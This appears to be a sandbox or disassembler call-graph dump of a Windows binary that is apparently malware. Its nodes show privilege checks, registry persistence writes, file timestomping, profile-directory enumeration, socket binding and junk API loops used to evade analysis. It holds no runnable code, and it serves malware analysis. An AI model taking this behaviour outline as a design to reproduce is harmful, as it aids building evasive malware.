6e5e2 GetProcessHeap HeapFree 3185->3186 3186->3183 3188 619f5 3187->3188 3189 6455b GetTokenInformation GetLastError 3187->3189 3188->3032 3190 64581 GlobalAlloc 3189->3190 3191 6467c CloseHandle 3189->3191 3192 6467b 3190->3192 3193 6459a GetTokenInformation 3190->3193 3191->3188 3192->3191 3194 645b1 ConvertSidToStringSidW 3193->3194 3195 64674 GlobalFree 3193->3195 3194->3195 3196 645c5 3194->3196 3195->3192 3196->3195 3197 645ce GetProcessHeap HeapAlloc 3196->3197 3198 64617 GetCapture 3197->3198 3199 64624 3198->3199 3199->3198 3200 64643 StrCmpIW LocalFree GetProcessHeap HeapFree 3199->3200 3200->3195 3202 6c0fa IsSystemResumeAutomatic 3201->3202 3203 6c107 3202->3203 3203->3202 3204 6c127 GetProcessHeap HeapAlloc 3203->3204 3205 6c18a GetClipboardSequenceNumber 3204->3205 3206 6c197 3205->3206 3206->3205 3207 6c1b7 GetModuleHandleA GetProcAddress GlobalMemoryStatusEx 3206->3207 3208 6c1f8 GetSystemInfo 3207->3208 3211 6c1f4 3207->3211 3209 6c1fe GetProcessHeap HeapAlloc 3208->3209 3210 6c32e GetDesktopWindow 3209->3210 3212 6c33b 3210->3212 3211->3209 3212->3210 3213 6c357 RegOpenKeyW 3212->3213 3214 6c37d GetProcessHeap HeapAlloc 3213->3214 3218 6c54d 3213->3218 3215 6c403 GetClipboardViewer 3214->3215 3217 6c410 3215->3217 3216 6c592 6 API calls 3216->3036 3217->3215 3219 6c42c RegQueryValueExW 3217->3219 3218->3216 3220 6c569 Sleep 3218->3220 3221 6c58a 3218->3221 3222 6c462 3219->3222 3220->3218 3220->3221 3221->3216 3223 6c479 GetProcessHeap HeapAlloc 3222->3223 3224 6c52f RegCloseKey GetProcessHeap HeapFree 3222->3224 3225 6c4c0 CountClipboardFormats 3223->3225 3224->3218 3226 6c4cd 3225->3226 3226->3225 3227 6c4e9 StrStrIW 3226->3227 3228 6c516 3227->3228 3229 6c500 Sleep StrStrIW 3228->3229 3230 6c51a GetProcessHeap HeapFree 3228->3230 3229->3228 3230->3224 3473 6a7d8 GetProcessHeap HeapAlloc 3231->3473 3233 6a999 3234 6a9a2 GetProcessHeap HeapAlloc 3233->3234 3482 6a973 3233->3482 3236 6a9f3 GetCapture 3234->3236 3237 6aa00 3236->3237 3237->3236 3238 6aa18 GetModuleHandleA 3237->3238 3239 6aa29 3238->3239 3240 6aa2e GetProcessHeap HeapAlloc 3238->3240 3241 6a973 2 API calls 3239->3241 3242 6aa75 GetOpenClipboardWindow 3240->3242 3241->3240 3243 6aa82 3242->3243 3243->3242 3244 6aa9a GetModuleHandleA 3243->3244 3245 6aab0 GetUserNameA 3244->3245 3246 6aaab 3244->3246 3247 6aad5 GetProcessHeap HeapAlloc 3245->3247 3248 6aad0 3245->3248 3249 6a973 2 API calls 3246->3249 3250 6ab16 GetClipboardViewer 3247->3250 3251 6a973 2 API calls 3248->3251 3249->3245 3252 6ab23 3250->3252 3251->3247 3252->3250 3253 6ab3b lstrcmpA 3252->3253 3254 6ab56 GetProcessHeap HeapAlloc 3253->3254 3255 6ab51 3253->3255 3257 6ab95 GetFocus 3254->3257 3256 6a973 2 API calls 3255->3256 3256->3254 3258 6aba2 3257->3258 3258->3257 3259 6abba lstrcmpA 3258->3259 3260 6abd6 GetComputerNameA 3259->3260 3261 6abd1 3259->3261 3263 6abf7 GetProcessHeap HeapAlloc 3260->3263 3264 6abf2 3260->3264 3262 6a973 2 API calls 3261->3262 3262->3260 3265 6ac30 GetCursor 3263->3265 3266 6a973 2 API calls 3264->3266 3267 6ac3d 3265->3267 3266->3263 3267->3265 3268 6ac55 lstrcmpA 3267->3268 3269 6ac70 GetProcessHeap HeapAlloc 3268->3269 3270 6ac6b 3268->3270 3272 6aca7 GetMenuCheckMarkDimensions 3269->3272 3271 6a973 2 API calls 3270->3271 3271->3269 3273 6acb4 3272->3273 3273->3272 3274 6accc lstrcmpA 3273->3274 3275 6ace2 3274->3275 3276 6ace7 GetProcessHeap HeapAlloc 3274->3276 3278 6a973 2 API calls 3275->3278 3277 6ad53 GetMessageExtraInfo 3276->3277 3279 6ad60 3277->3279 3278->3276 3279->3277 3280 6ad78 GetProcessHeap HeapAlloc 3279->3280 3281 6adce GetClipboardOwner 3280->3281 3282 6addb 3281->3282 3282->3281 3283 6adf3 3282->3283 3486 6a77c RegCreateKeyA 3283->3486 3285 6ae13 GetProcessHeap HeapAlloc 3287 6ae4f GetLastError 3285->3287 3289 6ae5c 3287->3289 3288 6a973 2 API calls 3288->3285 3289->3287 3290 6ae76 GetProcessHeap HeapAlloc 3289->3290 3291 6aeb8 CountClipboardFormats 3290->3291 3292 6aec5 3291->3292 3292->3291 3293 6aedf GetProcessHeap HeapAlloc 3292->3293 3294 6af1e GetFocus 3293->3294 3295 6af2b 3294->3295 3295->3294 3296 6af45 GetProcessHeap HeapAlloc 3295->3296 3297 6af89 GetMessageExtraInfo 3296->3297 3298 6af96 3297->3298 3298->3297 3299 6afb0 GetProcessHeap HeapAlloc 3298->3299 3300 6aff4 GetForegroundWindow 3299->3300 3301 6b001 3300->3301 3301->3300 3302 6b01b GetProcessHeap HeapAlloc 3301->3302 3303 6b072 GetProcessWindowStation 3302->3303 3304 6b07f 3303->3304 3304->3303 3305 6b097 GetProcessHeap HeapAlloc 3304->3305 3306 6b0da GetModuleHandleW 3305->3306 3307 6b0e9 3306->3307 3307->3306 3308 6b101 GetProcessHeap HeapAlloc 3307->3308 3309 6b13f GetCapture 3308->3309 3310 6b14c 3309->3310 3310->3309 3311 6b166 3310->3311 3312 6b1c2 StrStrA 3311->3312 3313 6b1e4 GetProcessHeap HeapAlloc 3311->3313 3314 6a973 2 API calls 3311->3314 3312->3311 3315 6b22d IsSystemResumeAutomatic 3313->3315 3314->3311 3316 6b23a 3315->3316 3316->3315 3317 6b252 3316->3317 3318 6a77c 3 API calls 3317->3318 3319 6b261 3318->3319 3320 6b272 GetProcessHeap HeapAlloc 3319->3320 3322 6a973 2 API calls 3319->3322 3321 6b2b7 GetCurrentThreadId 3320->3321 3323 6b2c4 3321->3323 3322->3320 3323->3321 3324 6b2dc StrStrA 3323->3324 3325 6b2f7 GetProcessHeap HeapAlloc 3324->3325 3326 6b2f2 3324->3326 3327 6b380 GetClipboardSequenceNumber 3325->3327 3328 6a973 2 API calls 3326->3328 3329 6b38d 3327->3329 3328->3325 3329->3327 3330 6b3a5 3329->3330 3331 6a77c 3 API calls 3330->3331 3333 6b3b1 3331->3333 3332 6b3c2 GetProcessHeap HeapAlloc 3334 6b427 ReleaseCapture 3332->3334 3333->3332 3335 6a973 2 API calls 3333->3335 3336 6b434 3334->3336 3335->3332 3336->3334 3337 6b44c StrStrA 3336->3337 3338 6b462 3337->3338 3339 6b467 GetProcessHeap HeapAlloc 3337->3339 3341 6a973 2 API calls 3338->3341 3340 6b4ce GetProcessWindowStation 3339->3340 3342 6b4db 3340->3342 3341->3339 3342->3340 3343 6b4f3 StrStrA 3342->3343 3344 6b50e GetProcessHeap HeapAlloc 3343->3344 3345 6b509 3343->3345 3346 6b569 GetMenuCheckMarkDimensions 3344->3346 3347 6a973 2 API calls 3345->3347 3348 6b576 3346->3348 3347->3344 3348->3346 3349 6b58e StrStrA 3348->3349 3350 6b5ac 44 API calls 3349->3350 3351 6b5a7 3349->3351 3350->3040 3352 6a973 2 API calls 3351->3352 3352->3350 3356 6b6ee 3353->3356 3354 6e0ef 42 API calls 3354->3356 3355 6b712 3355->3040 3356->3354 3356->3355 3489 673b6 GetProcessHeap HeapAlloc 3357->3489 3359 6e71e 3360 6e684 2 API calls 3359->3360 3361 6e723 GetProcessHeap HeapAlloc 3360->3361 3362 6e7ed AllocateAndInitializeSid 3361->3362 3363 6e745 GetComputerNameW 3361->3363 3364 6e822 CheckTokenMembership FreeSid 3362->3364 3365 6e851 CreateWellKnownSid 3362->3365 3366 6e7e8 3363->3366 3367 6e75f GetProcessHeap HeapAlloc 3363->3367 3364->3365 3368 6e841 3364->3368 3371 6e873 CheckTokenMembership 3365->3371 3377 6e84f 3365->3377 3496 6e310 RegOpenKeyExA 3366->3496 3370 6e79c GetClipboardOwner 3367->3370 3372 61a31 3368->3372 3509 6e967 3368->3509 3373 6e7a9 3370->3373 3371->3377 3378 641e5 GetProcessHeap HeapAlloc 3372->3378 3373->3370 3374 6e7c8 lstrcpyW GetProcessHeap HeapFree 3373->3374 3374->3366 3375 6e897 11 API calls 3375->3372 3377->3372 3377->3375 3379 64255 GetShellWindow 3378->3379 3380 64262 3379->3380 3380->3379 3381 6427a GetProcessHeap HeapAlloc 3380->3381 3382 642cd GetDoubleClickTime 3381->3382 3383 642da 3382->3383 3383->3382 3384 642f2 LoadLibraryA GetProcAddress 3383->3384 3385 6432f 3384->3385 3386 64501 GetProcessHeap HeapFree GetProcessHeap HeapFree 3385->3386 3387 6433d GetProcessHeap HeapAlloc 3385->3387 3386->3045 3388 64390 GetDialogBaseUnits 3387->3388 3389 6439d 3388->3389 3389->3388 3390 643b5 LoadLibraryA GetProcAddress 3389->3390 3391 643d2 3390->3391 3392 643e0 GetProcessHeap HeapAlloc 3391->3392 3393 644e9 CloseHandle GetProcessHeap HeapFree 3391->3393 3394 64433 CloseClipboard 3392->3394 3393->3386 3395 64440 3394->3395 3395->3394 3396 64458 LoadLibraryA GetProcAddress 3395->3396 3397 6447c GetProcessHeap HeapAlloc 3396->3397 3398 644d1 CloseHandle GetProcessHeap HeapFree 3397->3398 3399 64497 GetProcessHeap HeapFree 3397->3399 3398->3393 3399->3398 3513 6f5d9 GetProcessHeap HeapAlloc 3401->3513 3403 6bf20 3404 6f5d9 12 API calls 3403->3404 3405 6bf2a 3404->3405 3521 6bb40 GetProcessHeap HeapAlloc 3405->3521 3407 6c04c 3407->3044 3409 6bb40 36 API calls 3410 6bf62 3409->3410 3410->3407 3411 6bf6d GetProcessHeap HeapAlloc 3410->3411 3412 6bfab GetFocus 3411->3412 3413 6bfb8 3412->3413 3413->3412 3414 6bfd7 lstrcatW 3413->3414 3415 6bb40 36 API calls 3414->3415 3416 6bffe 3415->3416 3417 6c00b GetTickCount 3416->3417 3418 6c040 GetProcessHeap HeapFree 3416->3418 3419 6bb40 36 API calls 3417->3419 3418->3407 3420 6c032 3419->3420 3420->3418 3422 61a92 VirtualProtect 3421->3422 3423 6fcd2 GetProcessHeap HeapAlloc 3422->3423 3424 6fd64 GetDialogBaseUnits 3423->3424 3425 6fd71 3424->3425 3425->3424 3426 6fd89 RegOpenKeyExW 3425->3426 3427 6fdac GetProcessHeap HeapAlloc 3426->3427 3428 6fe6b GetProcessHeap HeapFree 3426->3428 3429 6fe14 CloseClipboard 3427->3429 3428->3050 3430 6fe21 3429->3430 3430->3429 3431 6fe39 RegSetValueExW RegCloseKey GetProcessHeap HeapFree 3430->3431 3431->3428 3545 6d97f 3432->3545 3435 6da2c GetFileSize 3437 6da41 GetProcessHeap HeapAlloc 3435->3437 3445 6da3a 3435->3445 3436 6da8b GetLastError 3436->3445 3437->3436 3440 6da5a ReadFile 3437->3440 3438 6da9f 3441 6dab9 3438->3441 3444 6daad GetProcessHeap HeapFree 3438->3444 3439 6da98 CloseHandle 3439->3438 3440->3436 3440->3445 3442 6dac0 GetProcessHeap HeapFree 3441->3442 3443 61adf 3441->3443 3442->3443 3443->3055 3446 6e684 GetModuleHandleA GetProcAddress 3443->3446 3444->3441 3445->3438 3445->3439 3447 61aeb 3446->3447 3448 616a9 GetProcessHeap HeapAlloc 3447->3448 3449 6e684 2 API calls 3448->3449 3450 616db 3449->3450 3451 616e6 GetProcessHeap HeapAlloc 3450->3451 3452 616df GetProcessHeap HeapFree 3450->3452 3453 617c1 GetActiveWindow 3451->3453 3452->3055 3454 617ce 3453->3454 3454->3453 3455 617e6 ExpandEnvironmentStringsW GetProcessHeap HeapAlloc 3454->3455 3456 61854 GetCaretBlinkTime 3455->3456 3457 61861 3456->3457 3457->3456 3458 61879 StrStrIW 3457->3458 3459 6188f GetProcessHeap HeapAlloc 3458->3459 3460 61955 StrCatW 3458->3460 3462 61908 GetModuleHandleW 3459->3462 3551 6dd0b 3460->3551 3463 61917 3462->3463 3463->3462 3464 6192f ExpandEnvironmentStringsW GetProcessHeap HeapFree 3463->3464 3464->3460 3466 61995 6 API calls 3466->3452 3468 61983 3575 6d8ba 6 API calls 3468->3575 3474 6a868 GetMessageExtraInfo 3473->3474 3475 6a875 3474->3475 3475->3474 3476 6a890 GetProcessHeap HeapAlloc 3475->3476 3477 6a8ea GetDoubleClickTime 3476->3477 3478 6a8f7 3477->3478 3478->3477 3479 6a90f LoadLibraryA GetProcAddress 3478->3479 3480 6a928 GetProcessHeap HeapFree GetProcessHeap HeapFree 3479->3480 3480->3233 3483 6a980 GetTickCount 3482->3483 3484 6a975 Sleep 3483->3484 3485 6a98a 3483->3485 3484->3483 3485->3234 3487 6a79f RegQueryValueExA RegCloseKey 3486->3487 3488 6a7d0 3486->3488 3487->3488 3488->3285 3488->3288 3490 67406 GetLogicalDrives 3489->3490 3491 67413 3490->3491 3491->3490 3492 67432 GetProcessHeap HeapAlloc 3491->3492 3493 67477 IsSystemResumeAutomatic 3492->3493 3494 67484 3493->3494 3494->3493 3495 674a3 6 API calls 3494->3495 3495->3359 3497 6e540 3496->3497 3498 6e3ad GetProcessHeap HeapAlloc RegQueryValueExA RegQueryValueExA 3496->3498 3497->3362 3499 6e417 3498->3499 3500 6e422 RegQueryValueExA 3499->3500 3501 6e496 RegCloseKey lstrlenA 3499->3501 3504 6e445 GetTickCount RegCloseKey RegOpenKeyExA 3500->3504 3507 6e48c 3500->3507 3502 6e4bf GetProcessHeap HeapAlloc GetComputerNameA lstrlenA 3501->3502 3503 6e4b1 3501->3503 3505 6e500 GetProcessHeap HeapFree GetProcessHeap HeapFree 3502->3505 3506 6e4f2 3502->3506 3503->3502 3503->3503 3504->3507 3508 6e471 RegSetValueExA 3504->3508 3505->3497 3506->3505 3506->3506 3507->3501 3508->3507 3510 6e9b3 3509->3510 3511 6e97b GetCurrentProcess OpenProcessToken 3509->3511 3510->3377 3511->3510 3512 6e995 GetTokenInformation CloseHandle 3511->3512 3512->3510 3514 6f62d GetShellWindow 3513->3514 3515 6f63a 3514->3515 3515->3514 3516 6f655 GetProcessHeap HeapAlloc 3515->3516 3517 6f68f GetLogicalDrives 3516->3517 3518 6f69c 3517->3518 3518->3517 3519 6f6b4 GetModuleHandleA GetProcAddress 3518->3519 3520 6f6cb GetProcessHeap HeapFree GetProcessHeap HeapFree 3519->3520 3520->3403 3522 6be10 3521->3522 3523 6bb7f GetProcessHeap HeapAlloc 3521->3523 3522->3407 3522->3409 3524 6be03 GetProcessHeap HeapFree 3523->3524 3525 6bb96 GetProcessHeap HeapAlloc 3523->3525 3524->3522 3526 6bbad GetProcessHeap HeapAlloc 3525->3526 3527 6bdf4 GetProcessHeap HeapFree 3525->3527 3528 6bbf9 ReleaseCapture 3526->3528 3527->3524 3529 6bc06 3528->3529 3529->3528 3530 6bc25 GetSystemDirectoryW 3529->3530 3532 6bdd5 GetProcessHeap HeapFree 3530->3532 3533 6bc5b 3530->3533 3534 6bde4 GetProcessHeap HeapFree 3532->3534 3535 6f5d9 12 API calls 3533->3535 3539 6bc77 lstrcatW FindFirstFileW 3533->3539 3534->3527 3537 6bc69 3535->3537 3538 6f5d9 12 API calls 3537->3538 3538->3539 3539->3532 3541 6bca2 3539->3541 3540 6bcca StrRChrW 3540->3541 3541->3540 3542 6bda6 FindClose 3541->3542 3543 6bd82 FindNextFileW 3541->3543 3542->3534 3543->3541 3544 6bd8e FindFirstFileW 3543->3544 3544->3541 3546 6d98e ExpandEnvironmentStringsW 3545->3546 3547 6d9e9 CreateFileW 3545->3547 3546->3547 3548 6d99e GetProcessHeap HeapAlloc 3546->3548 3547->3435 3547->3436 3548->3547 3549 6d9be ExpandEnvironmentStringsW 3548->3549 3549->3547 3550 6d9d8 GetProcessHeap HeapFree 3549->3550 3550->3547 3552 6d97f 6 API calls 3551->3552 3553 6dd1e CreateFileW 3552->3553 3554 6dd44 GetLastError 3553->3554 3555 6dd4e 3553->3555 3557 6dda2 3554->3557 3600 6dad5 6 API calls 3555->3600 3559 6dda6 GetProcessHeap HeapFree 3557->3559 3560 61970 3557->3560 3558 6dd5d WriteFile 3561 6dd75 SetEndOfFile 3558->3561 3562 6dd80 GetLastError 3558->3562 3559->3560 3560->3466 3564 68761 GetProcessHeap HeapAlloc 3560->3564 3563 6dd88 SetFileTime CloseHandle 3561->3563 3562->3563 3563->3557 3565 687b8 GetTickCount 3564->3565 3566 687c5 3565->3566 3566->3565 3567 687e0 GetProcessHeap HeapAlloc 3566->3567 3568 68819 GetCapture 3567->3568 3569 68826 3568->3569 3569->3568 3570 6883e GetProcessHeap HeapAlloc 3569->3570 3571 68885 GetCursor 3570->3571 3572 68892 3571->3572 3572->3571 3573 688b1 LoadLibraryA GetProcAddress 3572->3573 3574 688d3 6 API calls 3573->3574 3574->3468 3576 6d957 FreeSid 3575->3576 3577 6d960 3575->3577 3576->3577 3578 6d96c LocalFree 3577->3578 3579 6d971 3577->3579 3578->3579 3580 6198b 3579->3580 3581 6d975 LocalFree 3579->3581 3582 61560 3580->3582 3581->3580 3613 61000 3582->3613 3585 61684 3585->3466 3586 61589 StrDupW 3587 615a0 3586->3587 3588 615b1 GetProcessHeap HeapAlloc 3587->3588 3589 61642 3587->3589 3590 615e8 GetClipboardViewer 3588->3590 3591 6dd0b 32 API calls 3589->3591 3592 615f5 3590->3592 3593 61650 3591->3593 3592->3590 3595 61614 GetProcessHeap HeapFree 3592->3595 3594 6165d 3593->3594 3621 6110c GetProcessHeap HeapAlloc 3593->3621 3597 61669 GetProcessHeap HeapFree 3594->3597 3598 61675 GetProcessHeap HeapFree 3594->3598 3595->3589 3597->3598 3598->3585 3601 6dc47 ReleaseCapture 3600->3601 3602 6dc54 3601->3602 3602->3601 3603 6dc73 3602->3603 3604 6d97f 6 API calls 3603->3604 3605 6dc7a 3604->3605 3606 6dc80 CreateFileW 3605->3606 3607 6dcf2 GetProcessHeap HeapFree 3605->3607 3608 6dc9b 3606->3608 3609 6dce2 GetProcessHeap HeapFree 3606->3609 3607->3558 3608->3609 3610 6dca0 GetFileTime 3608->3610 3609->3607 3611 6dcdb CloseHandle 3610->3611 3612 6dcb4 SystemTimeToFileTime SystemTimeToFileTime SystemTimeToFileTime 3610->3612 3611->3609 3612->3611 3645 6a626 GetProcessHeap HeapAlloc 3613->3645 3615 61101 3615->3585 3615->3586 3616 6101d 3616->3615 3616->3616 3617 61061 GetProcessHeap HeapAlloc wsprintfW 3616->3617 3618 610a6 lstrlenW GetProcessHeap HeapAlloc WideCharToMultiByte 3617->3618 3619 610a0 3617->3619 3618->3619 3619->3619 3620 610e8 GetProcessHeap HeapFree 3619->3620 3620->3615 3622 6119f CountClipboardFormats 3621->3622 3623 611ac 3622->3623 3623->3622 3624 611c4 GetProcessHeap HeapAlloc 3623->3624 3625 612ea GetDialogBaseUnits 3624->3625 3626 612f7 3625->3626 3626->3625 3627 6130f 3626->3627 3666 638f7 3627->3666 3630 61332 GetProcessHeap HeapAlloc 3632 61372 GetDialogBaseUnits 3630->3632 3631 6153e GetProcessHeap HeapFree GetProcessHeap HeapFree 3631->3594 3633 6137f 3632->3633 3633->3632 3634 6139a GetProcessHeap HeapAlloc 3633->3634 3635 613e0 GetCurrentThreadId 3634->3635 3636 613ed 3635->3636 3636->3635 3637 61408 GetProcessHeap HeapAlloc 3636->3637 3638 61458 ReleaseCapture 3637->3638 3639 61465 3638->3639 3639->3638 3640 61480 RegSetValueExW 3639->3640 3641 614a8 3640->3641 3641->3641 3642 614b7 RegSetValueExW 3641->3642 3643 614de 3642->3643 3643->3643 3644 614ed 8 API calls 3643->3644 3644->3631 3646 6a6c5 GetCurrentThreadId 3645->3646 3647 6a6d2 3646->3647 3647->3646 3648 6a6f4 3647->3648 3656 6a4dc GetProcessHeap HeapAlloc 3648->3656 3650 6a6f9 3651 6a758 3650->3651 3652 6a70a GetProcessHeap HeapAlloc 3650->3652 3654 6a763 GetProcessHeap HeapFree 3651->3654 3653 6a726 3652->3653 3652->3654 3653->3651 3655 6a4dc 12 API calls 3653->3655 3654->3616 3655->3653 3657 6a52a GetMessagePos 3656->3657 3658 6a537 3657->3658 3658->3657 3659 6a54f 3658->3659 3660 6a562 GetProcessHeap HeapAlloc 3659->3660 3662 6a5fd GetProcessHeap HeapFree 3659->3662 3661 6a5aa GetCurrentThreadId 3660->3661 3663 6a5b7 3661->3663 3662->3650 3663->3661 3665 6a5cf LoadLibraryA GetProcAddress GetProcessHeap HeapFree 3663->3665 3665->3662 3667 63932 RegOpenKeyExW 3666->3667 3668 63919 RegCreateKeyExW 3666->3668 3669 6131b 3667->3669 3668->3669 3669->3630 3669->3631 3671 6fa08 GetShellWindow 3670->3671 3672 6fa15 3671->3672 3672->3671 3673 6fa34 GetProcessHeap HeapAlloc 3672->3673 3674 6fa7e GetCapture 3673->3674 3675 6fa8b 3674->3675 3675->3674 3676 6faaa GetModuleHandleA GetProcAddress 3675->3676 3677 6faf1 3676->3677 3678 6fb35 3677->3678 3679 6faf8 3677->3679 3705 6f4a9 GetProcessHeap HeapAlloc 3678->3705 3680 6f6f4 24 API calls 3679->3680 3682 6fb07 3680->3682 3683 6fb50 GetProcessHeap HeapFree GetProcessHeap HeapFree 3682->3683 3684 6fb49 CloseHandle 3682->3684 3683->3071 3684->3683 3686 6f766 GetClipboardSequenceNumber 3685->3686 3687 6f773 3686->3687 3687->3686 3688 6f795 GetProcessHeap HeapAlloc 3687->3688 3689 6f7cf GetShellWindow 3688->3689 3690 6f7dc 3689->3690 3690->3689 3691 6f7fb GetModuleHandleA GetProcAddress 3690->3691 3692 6f829 3691->3692 3693 6f4a9 12 API calls 3692->3693 3694 6f830 GetProcessHeap HeapFree GetProcessHeap HeapFree 3693->3694 3694->3083 3696 6f8a1 GetShellWindow 3695->3696 3697 6f8ae 3696->3697 3697->3696 3698 6f8cd GetProcessHeap HeapAlloc 3697->3698 3699 6f920 CloseClipboard 3698->3699 3700 6f92d 3699->3700 3700->3699 3701 6f94c LoadLibraryA GetProcAddress 3700->3701 3702 6f965 3701->3702 3703 6f4a9 12 API calls 3702->3703 3704 6f96c GetProcessHeap HeapFree GetProcessHeap HeapFree 3703->3704 3704->3074 3706 6f4fd GetShellWindow 3705->3706 3707 6f50a 3706->3707 3707->3706 3708 6f525 GetProcessHeap HeapAlloc 3707->3708 3709 6f574 GetInputState 3708->3709 3710 6f581 3709->3710 3710->3709 3711 6f599 GetModuleHandleA GetProcAddress 3710->3711 3712 6f5b0 GetProcessHeap HeapFree GetProcessHeap HeapFree 3711->3712 3712->3682 3714 64135 GetProcessHeap HeapAlloc 3713->3714 3714->3116 3716 6be1a 7 API calls 3715->3716 3717 6c74f 3716->3717 3718 6c77c VirtualProtect 3717->3718 3721 6c055 36 API calls 3717->3721 3719 6c7b8 GetModuleHandleW 3718->3719 3720 6c7a0 3718->3720 3723 6e6ed 66 API calls 3719->3723 3724 6c7a7 VirtualProtect 3720->3724 3722 6c758 3721->3722 3726 6a98b 140 API calls 3722->3726 3725 6c7d3 GetUserNameW 3723->3725 3724->3719 3727 6c828 GetProcessHeap HeapAlloc 3725->3727 3728 6c8b0 3725->3728 3734 6c75d 3726->3734 3729 6c86b GetTickCount 3727->3729 3731 641e5 32 API calls 3728->3731 3732 6c878 3729->3732 3730 6b6b4 42 API calls 3730->3734 3737 6c8b8 3731->3737 3732->3729 3733 6c890 SetEnvironmentVariableW GetProcessHeap HeapFree 3732->3733 3733->3728 3734->3718 3734->3730 3735 6c76f Sleep 3734->3735 3739 6b71e 42 API calls 3734->3739 3735->3734 3736 6cab4 3777 6c5e5 WSAStartup socket 3736->3777 3737->3736 3741 6bf00 43 API calls 3737->3741 3739->3734 3745 6c8fe 3741->3745 3742 6cb07 GetCommandLineA 3743 6cb14 3742->3743 3743->3742 3744 6cb2f GetProcessHeap HeapAlloc 3743->3744 3746 6cb71 GetCommandLineA 3744->3746 3745->3736 3747 6c97e GetProcessHeap HeapAlloc 3745->3747 3748 6c90f GetProcessHeap HeapAlloc 3745->3748 3751 6cb7e 3746->3751 3749 6ca5b GetProcessHeap 3747->3749 3750 6c951 CreatePopupMenu 3748->3750 3754 6ca64 3749->3754 3753 6c95e 3750->3753 3751->3746 3752 6cb99 GetProcessHeap HeapAlloc 3751->3752 3755 6cbd2 GetOpenClipboardWindow 3752->3755 3753->3750 3756 6c979 3753->3756 3754->3749 3757 6ca7f ConvertStringSecurityDescriptorToSecurityDescriptorA GetProcessHeap HeapFree 3754->3757 3758 6cbdf 3755->3758 3756->3757 3757->3736 3758->3755 3759 6cc03 wsprintfA 3758->3759 3760 64521 17 API calls 3759->3760 3761 6cc20 GetProcessHeap HeapAlloc 3760->3761 3762 6cc62 GetTickCount 3761->3762 3763 6cc6f 3762->3763 3763->3762 3764 6cc8a wsprintfA GetProcessHeap HeapAlloc 3763->3764 3765 6ccd7 GetActiveWindow 3764->3765 3766 6cce4 3765->3766 3766->3765 3767 6cd01 GetProcessHeap HeapAlloc 3766->3767 3768 6cd42 GetLogicalDrives 3767->3768 3769 6cd4f 3768->3769 3769->3768 3770 6cd6a GetProcessHeap HeapAlloc 3769->3770 3771 6cdc5 GetModuleHandleW 3770->3771 3772 6cdd4 3771->3772 3772->3771 3773 6cdef GetProcessHeap HeapAlloc 3772->3773 3774 6ce3e GetOpenClipboardWindow 3773->3774 3775 6ce4b 3774->3775 3775->3774 3776 6ce63 29 API calls 3775->3776 3787 628ec 3776->3787 3794 67294 3776->3794 3807 6d38e 3776->3807 3818 633f3 WSAStartup 3776->3818 3839 6168c 3776->3839 3778 6c622 GetCurrentProcessId 3777->3778 3786 6c714 GetProcessHeap HeapAlloc 3777->3786 3779 6c642 3778->3779 3778->3786 3780 6c671 GetProcessHeap HeapAlloc 3779->3780 3781 6c692 GetProcessWindowStation 3780->3781 3782 6c69f 3781->3782 3782->3781 3783 6c6b8 inet_addr htons bind 3782->3783 3784 6c716 closesocket GetProcessHeap HeapFree 3783->3784 3785 6c6f1 GetProcessHeap HeapFree 3783->3785 3784->3786 3785->3780 3785->3786 3786->3742 3788 628ff 3787->3788 3790 62908 3788->3790 3791 628f4 Sleep 3788->3791 3843 622e6 GetProfilesDirectoryW 3788->3843 3885 6229e 3790->3885 3791->3788 3795 672a7 WaitForSingleObject 3794->3795 3797 6731e CreateThread CloseHandle 3794->3797 3796 672b9 3795->3796 3795->3797 3796->3797 3798 672c1 GetCurrentProcessId 3796->3798 3802 673ad 3797->3802 3803 6737e 3797->3803 3989 6485c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 3798->3989 3804 6e0ef 42 API calls 3803->3804 3805 67399 Sleep 3803->3805 3806 673a0 Sleep 3803->3806 3804->3803 3805->3806 3806->3802 3806->3803 4008 6cf97 3807->4008 3810 6d4bf 3812 6d4b0 Sleep 3812->3810 3815 6d3cf 3812->3815 3814 6dd0b 32 API calls 3814->3815 3815->3812 3815->3814 3816 6d8ba 9 API calls 3815->3816 4018 6d076 GetProcessHeap HeapAlloc 3815->4018 4041 6482b 3815->4041 3817 6d472 CreateThread CloseHandle 3816->3817 3817->3815 4146 6d354 3817->4146 3819 64521 17 API calls 3818->3819 3820 63439 3819->3820 3821 6343d SetEvent ExitThread 3820->3821 3822 63451 3820->3822 4151 63e17 GetProcessHeap HeapAlloc 3822->4151 3826 63547 3829 63513 Sleep 3830 63491 3829->3830 3830->3826 3830->3829 3836 63300 20 API calls 3830->3836 3837 6482b 2 API calls 3830->3837 4188 63199 GetProcessHeap HeapAlloc 3830->4188 4196 6b9e6 GetProcessHeap HeapAlloc 3830->4196 4207 62915 3830->4207 4215 63adc GetProcessHeap HeapAlloc 3830->4215 3831 6482b 2 API calls 3833 63480 SetEvent 3831->3833 3833->3830 3836->3830 3838 63507 SetEvent 3837->3838 3838->3829 3840 61691 Sleep 3839->3840 3841 61560 101 API calls 3840->3841 3842 616a2 3841->3842 3842->3840 3844 628df 3843->3844 3845 62318 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 3843->3845 3844->3788 3846 62353 GetProcessHeap HeapAlloc GetProfilesDirectoryW 3845->3846 3847 628a6 3845->3847 3846->3847 3848 623ac GetProcessHeap HeapAlloc 3846->3848 3849 628ad GetProcessHeap HeapFree 3847->3849 3850 628ba 3847->3850 3855 6240a GetOpenClipboardWindow 3848->3855 3849->3850 3851 628be GetProcessHeap HeapFree 3850->3851 3852 628cb 3850->3852 3851->3852 3852->3844 3854 628d2 GetProcessHeap HeapFree 3852->3854 3854->3844 3856 62417 3855->3856 3856->3855 3857 6242f 3856->3857 3857->3857 3858 62458 FindFirstFileW 3857->3858 3859 62482 3858->3859 3860 6288a FindClose GetProcessHeap HeapFree 3858->3860 3861 624ba GetProcessHeap HeapAlloc 3859->3861 3860->3847 3862 624dd GetCommandLineA 3861->3862 3863 624ea 3862->3863 3863->3862 3864 62502 GetProcessHeap HeapAlloc 3863->3864 3865 6252b GetForegroundWindow 3864->3865 3866 62538 3865->3866 3866->3865 3867 62552 lstrcmpW 3866->3867 3868 62855 GetProcessHeap HeapFree GetProcessHeap HeapFree FindNextFileW 3867->3868 3869 62574 lstrcmpW 3867->3869 3868->3861 3870 62887 3868->3870 3869->3868 3871 6258a 3869->3871 3870->3860 3871->3868 3872 62597 GetProcessHeap HeapAlloc 3871->3872 3873 62610 GetCurrentProcessId 3872->3873 3874 6261d 3873->3874 3874->3873 3875 62638 GetProcessHeap HeapAlloc 3874->3875 3876 626e9 GetCurrentProcessId 3875->3876 3877 626f6 3876->3877 